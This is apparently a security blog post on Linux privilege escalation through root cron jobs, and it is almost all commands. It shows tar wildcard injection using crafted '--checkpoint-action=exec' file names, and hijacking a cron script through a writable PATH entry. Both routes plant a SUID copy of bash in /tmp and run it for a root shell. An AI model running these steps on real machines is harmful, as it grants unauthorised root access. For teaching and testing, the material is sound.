Cron Jobs Part 2

Wildcard Injection

ls *
touch '/home/user/files/-la'
* * * * * root /home/admin/scripts/backup.sh
# creating a program that copies /bin/bash over to /tmp and adds the SUID bit on itecho 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \/home/user/files/pwn.sh# creates a file '--checkpoint=1' that will be interpreted as an argumenttouch /home/user/files/--checkpoint=1# creates a file '—checkpoint-action=exec=sh\ pwn.sh' that will be interpreted as an argumenttouch /home/user/files/--checkpoint-action=exec=sh\ pwn.sh
root@debian:~#

Redefining $PATH

root@kali:~# $PATHbash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: No such file or directory
# path variablePATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# cron job running a script called nothing.sh every minute as root* * * * * root nothing.sh
# creating a program called nothing.sh that copies /bin/bash over to /tmp and adds the SUID bit on itecho 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > \/home/user/nothing.sh# change the permissions of the file so it’s executablechmod +x /home/user/nothing.sh# wait 1 minute for the cron job to run# executes the modified version of bash we created with the SUID bit/tmp/bash -p
root@debian:~#

--

--

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP